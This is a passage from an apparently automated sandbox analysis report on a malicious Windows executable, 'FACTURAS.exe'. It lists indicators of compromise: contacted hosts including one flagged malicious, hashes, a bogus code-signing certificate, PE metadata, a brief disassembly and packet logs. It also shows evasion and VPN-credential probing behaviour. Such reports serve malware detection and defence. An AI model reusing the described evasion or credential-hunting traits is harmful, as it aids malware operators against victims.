https://doc-0c-6k-docs.googleusercontent.com/	CasPol.exe, 00000005.00000002.29204294337.0000000001276000.00000004.00000020.sdmp, CasPol.exe, 00000005.00000003.24569225634.00000000012BE000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.24573156423.00000000012BE000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.24573675447.00000000012C1000.00000004.00000001.sdmp	false		high
https://drive.google.com/H	CasPol.exe, 00000005.00000002.29203974975.0000000001238000.00000004.00000020.sdmp	false		high
http://kFWRbv.com	CasPol.exe, 00000005.00000002.29215652303.000000001E1A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://csp.withgoogle.com/csp/report-to/gse_l9ocaq	CasPol.exe, 00000005.00000003.24569436789.00000000012F1000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.24569082493.00000000012F1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.129	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
142.250.186.174	drive.google.com	United States	15169	GOOGLEUS	false
116.202.203.61	furteksdokuma.com.tr	Germany	24940	HETZNER-ASDE	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	531838
Start date:	01.12.2021
Start time:	13:24:01
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	FACTURAS.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@6/1@3/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 96% Number of executed functions: 68 Number of non-executed functions: 22
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 20.82.207.122, 20.82.19.171 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, wdcpalt.microsoft.com, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, wdcp.microsoft.com, arc.msn.com, nexusrules.officeapps.live.com, wd-prod-cp.trafficmanager.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:26:45	API Interceptor	2694x Sleep call for process: CasPol.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
116.202.203.61	Scanned Payment Copy00024.scr.exe	Get hash	malicious	Browse
	FAKTURA 9502461485.exe	Get hash	malicious	Browse
	exe.exe	Get hash	malicious	Browse
	FACTURAS.exe	Get hash	malicious	Browse
	sG98fX27l7.exe	Get hash	malicious	Browse
	BBVA-Confirming Facturas Pagadas al Vencimiento.exe	Get hash	malicious	Browse
	ejecutable.exe	Get hash	malicious	Browse
	TT COPY.exe	Get hash	malicious	Browse
	PEDIDO.exe	Get hash	malicious	Browse
	Request Quotation.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HETZNER-ASDE	45QFR72RNm.exe	Get hash	malicious	Browse	144.76.183.53
	gjYAgorDLm.exe	Get hash	malicious	Browse	5.9.162.45
	#Encoder_n2.exe	Get hash	malicious	Browse	116.202.14.219
	iU17wh2uUd.exe	Get hash	malicious	Browse	5.9.162.45
	iU17wh2uUd.exe	Get hash	malicious	Browse	5.9.162.45
	Sz4lxTmH7r.exe	Get hash	malicious	Browse	5.9.162.45
	7AF33E5528AB8A8F45EE7B8C4DD24B4014FEAA6E1D310.exe	Get hash	malicious	Browse	5.9.162.45
	#Ud83d#Udce9-susan.hinds6459831.htm	Get hash	malicious	Browse	95.216.15.24
	V2N1M2_P.VBS	Get hash	malicious	Browse	144.76.136.153
	OJypySurXg.exe	Get hash	malicious	Browse	5.9.162.45
	f7Kudio57m.exe	Get hash	malicious	Browse	159.69.92.223
	CYw9gmWr8C.exe	Get hash	malicious	Browse	159.69.92.223
	bjDDx3RtEZ.exe	Get hash	malicious	Browse	5.9.162.45
	setup_x86_x64_install.exe	Get hash	malicious	Browse	5.9.162.45
	Fortnite cheat.exe	Get hash	malicious	Browse	144.76.136.153
	991D4DC612FF80AB2506510DBA31531DB995FE3F64318.exe	Get hash	malicious	Browse	5.9.162.45
	Consignment Notification.exe	Get hash	malicious	Browse	168.119.107.124
	7UxX7VCtH5.exe	Get hash	malicious	Browse	5.9.162.45
	com.repotools.iptvnewplay_0_apps.evozi.com.apk	Get hash	malicious	Browse	144.76.0.164
	MMUc2aeWxZ.exe	Get hash	malicious	Browse	5.9.162.45

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	RFQ 001030112021#U00b7pdf.exe	Get hash	malicious	Browse	142.250.185.129 142.250.186.174
	item-107262298.xlsb	Get hash	malicious	Browse	142.250.185.129 142.250.186.174
	products samples pdf.exe	Get hash	malicious	Browse	142.250.185.129 142.250.186.174
	item-1202816963.xlsb	Get hash	malicious	Browse	142.250.185.129 142.250.186.174
	draft_inv dec21.exe	Get hash	malicious	Browse	142.250.185.129 142.250.186.174
	Nh3xqMPynb.exe	Get hash	malicious	Browse	142.250.185.129 142.250.186.174
	#Encoder_n1.exe	Get hash	malicious	Browse	142.250.185.129 142.250.186.174
	#Encoder_n2.exe	Get hash	malicious	Browse	142.250.185.129 142.250.186.174
	iU17wh2uUd.exe	Get hash	malicious	Browse	142.250.185.129 142.250.186.174
	iU17wh2uUd.exe	Get hash	malicious	Browse	142.250.185.129 142.250.186.174
	counter-119221000.xls	Get hash	malicious	Browse	142.250.185.129 142.250.186.174
	PURCHASE ORDER.exe	Get hash	malicious	Browse	142.250.185.129 142.250.186.174
	5243F620073F2AD7C464410D59B34794525CF6875498D.exe	Get hash	malicious	Browse	142.250.185.129 142.250.186.174
	phish.htm	Get hash	malicious	Browse	142.250.185.129 142.250.186.174
	box-1688169224.xlsb	Get hash	malicious	Browse	142.250.185.129 142.250.186.174
	box-1689035414.xlsb	Get hash	malicious	Browse	142.250.185.129 142.250.186.174
	html.html	Get hash	malicious	Browse	142.250.185.129 142.250.186.174
	#Ud83d#Udce9-susan.hinds6459831.htm	Get hash	malicious	Browse	142.250.185.129 142.250.186.174
	phish.htm	Get hash	malicious	Browse	142.250.185.129 142.250.186.174
	OJypySurXg.exe	Get hash	malicious	Browse	142.250.185.129 142.250.186.174

Dropped Files

No context

Created / dropped Files

\Device\ConDrv Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.964735178725505
Encrypted:	false
SSDEEP:	3:IBVFBWAGRHneyy:ITqAGRHner
MD5:	9F754B47B351EF0FC32527B541420595
SHA1:	006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256:	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512:	C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	NordVPN directory not found!..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.1786714462714025
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	FACTURAS.exe
File size:	152720
MD5:	ab82f374210a08b2221d5e1807400a32
SHA1:	6a56b81549185015743deaa196996f73787c5c7d
SHA256:	ab41887e471ac822f1240bf554098fa042910f1c7ac2f9e390081829515bc2fa
SHA512:	8844aca394f38a59a63b1984a00b16861a0f7e0fdc04ba20aba264da79fc6e54eeb73c6814f0745ab37ba12ba306e6371561e64f23deac22ba555d75aa3b2019
SSDEEP:	1536:gZEG7DecysKvlp4erYY77BLm321zb2aKQhbHdEs5obasAJepPNp8:6EG7Dpy9nYYn2EzBKYpdOSoNp8
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L.....4U.....................0............... ....@................

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x401888
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5534C2F5 [Mon Apr 20 09:12:21 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b209c8634733456633136bfedc71877a

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=parteringens@Shiremen3.slu, CN=SELSKABSLOKALET, OU=Interimskvitteringerne, O=JUSTITSEN, L=Rutiners, S=honkytonks, C=ML
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	01/12/2021 10:36:44 01/12/2022 10:36:44
Subject Chain	E=parteringens@Shiremen3.slu, CN=SELSKABSLOKALET, OU=Interimskvitteringerne, O=JUSTITSEN, L=Rutiners, S=honkytonks, C=ML
Version:	3
Thumbprint MD5:	CDDFD4747563B21AE94964F7C6F9EB7A
Thumbprint SHA-1:	1CFBE705D5055A36D357E2EF5F5FE20BC6959CA9
Thumbprint SHA-256:	176B1E7918EE21C3FEADE8CC2C9D049B7DFDE73ECFE288C07CF37C692D0011A0
Serial:	00

Entrypoint Preview

Instruction
push 004019BCh
call 00007F61B0690CE5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [edx-58h], ah
wait
dec esp
push ss
das
dec ebx
test dword ptr [esi+10DDAE1Bh], esi
inc edi
scasb
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
imul ebp, dword ptr [esi+6Fh], 0065696Ch
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
add byte ptr [esi], bl
mov dword ptr [A74FB7F8h], eax
pushfd
dec ebp
test al, DFh
pop edx
mov dword ptr [ecx-242943C3h], eax
fcomip st(0), st(2)

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x215d4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24000	0x970	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x24000	0x1490
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x234	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x20cc4	0x21000	False	0.367520419034	data	5.25414504645	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x22000	0x122c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x24000	0x970	0x1000	False	0.173828125	data	2.0476168209	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x24840	0x130	data
RT_ICON	0x24558	0x2e8	data
RT_ICON	0x24430	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x24400	0x30	data
RT_VERSION	0x24150	0x2b0	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

__vbaR8FixI4, _CIcos, _adj_fptan, __vbaHresultCheck, __vbaVarMove, __vbaStrI4, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, __vbaVarIdiv, _adj_fdiv_m64, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, __vbaLenBstrB, __vbaLenVar, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFPFix, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaGet3, __vbaAryConstruct2, __vbaVarTstEq, __vbaObjVar, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaVarCat, _CIlog, __vbaFileOpen, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaInStrB, __vbaVarDup, __vbaVarTstGe, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaR8IntI4, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0404 0x04b0
LegalCopyright	Union
InternalName	filterhjdens
FileVersion	4.00
CompanyName	Union
LegalTrademarks	Union
ProductName	Union
ProductVersion	4.00
FileDescription	Union
OriginalFilename	filterhjdens.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 1, 2021 13:26:34.633433104 CET	49805	443	192.168.11.20	142.250.186.174
Dec 1, 2021 13:26:34.633497000 CET	443	49805	142.250.186.174	192.168.11.20
Dec 1, 2021 13:26:34.633779049 CET	49805	443	192.168.11.20	142.250.186.174
Dec 1, 2021 13:26:34.652040005 CET	49805	443	192.168.11.20	142.250.186.174
Dec 1, 2021 13:26:34.652095079 CET	443	49805	142.250.186.174	192.168.11.20
Dec 1, 2021 13:26:34.691802025 CET	443	49805	142.250.186.174	192.168.11.20
Dec 1, 2021 13:26:34.691989899 CET	49805	443	192.168.11.20	142.250.186.174
Dec 1, 2021 13:26:34.692543983 CET	443	49805	142.250.186.174	192.168.11.20
Dec 1, 2021 13:26:34.692809105 CET	49805	443	192.168.11.20	142.250.186.174
Dec 1, 2021 13:26:34.818409920 CET	49805	443	192.168.11.20	142.250.186.174
Dec 1, 2021 13:26:34.819371939 CET	443	49805	142.250.186.174	192.168.11.20
Dec 1, 2021 13:26:34.819556952 CET	49805	443	192.168.11.20	142.250.186.174
Dec 1, 2021 13:26:34.824218035 CET	49805	443	192.168.11.20	142.250.186.174
Dec 1, 2021 13:26:34.868002892 CET	443	49805	142.250.186.174	192.168.11.20
Dec 1, 2021 13:26:35.210597038 CET	443	49805	142.250.186.174	192.168.11.20
Dec 1, 2021 13:26:35.210706949 CET	443	49805	142.250.186.174	192.168.11.20
Dec 1, 2021 13:26:35.210822105 CET	49805	443	192.168.11.20	142.250.186.174
Dec 1, 2021 13:26:35.210892916 CET	49805	443	192.168.11.20	142.250.186.174
Dec 1, 2021 13:26:35.248164892 CET	49805	443	192.168.11.20	142.250.186.174
Dec 1, 2021 13:26:35.248192072 CET	443	49805	142.250.186.174	192.168.11.20
Dec 1, 2021 13:26:35.292975903 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.293006897 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.293135881 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.293641090 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.293678999 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.346996069 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.347201109 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.350043058 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.350300074 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.353712082 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.353739023 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.354212999 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.354368925 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.354688883 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.396001101 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.597348928 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.597552061 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.597918034 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.598311901 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.598622084 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.599001884 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.600065947 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.600325108 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.600363970 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.600389957 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.600756884 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.603199959 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.603539944 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.604118109 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.604372025 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.607716084 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.607930899 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.607985973 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.608016968 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.608087063 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.608227015 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.608273983 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.608494997 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.608721018 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.608921051 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.608968973 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.609174013 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.609405041 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.609607935 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.609654903 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.609884024 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.610110044 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.610308886 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.610356092 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.610558033 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.610856056 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.611033916 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.611074924 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.611263037 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.611629009 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.612071991 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.612123966 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.612380028 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.612430096 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.612458944 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.612612963 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.612735987 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.613068104 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.613419056 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.613461018 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.613727093 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.613759995 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.614038944 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.614073992 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.614311934 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.614475012 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.614634037 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.614662886 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.614810944 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.615138054 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.615364075 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.615411043 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.615677118 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.616023064 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.616249084 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.616287947 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.616518974 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.616739988 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.617032051 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.617079973 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.617270947 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.617491007 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.617811918 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.617858887 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.618092060 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.618259907 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.618431091 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.618630886 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.618679047 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.619040966 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.619101048 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.619132996 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.619263887 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.619384050 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.619486094 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.619539022 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.619796038 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.619972944 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.620134115 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.620186090 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.620212078 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.620286942 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.620363951 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.620383024 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.620524883 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.620826006 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.621071100 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.621110916 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.621220112 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.621292114 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.621320963 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.621385098 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.621515036 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.621562004 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.621686935 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.622100115 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.622270107 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.622293949 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.622323036 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.622416973 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.622443914 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.622693062 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.623017073 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.623188972 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.623274088 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.623289108 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.623322010 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.623645067 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.623908997 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.624057055 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.624089956 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.624207973 CET	443	49806	142.250.185.129	192.168.11.20
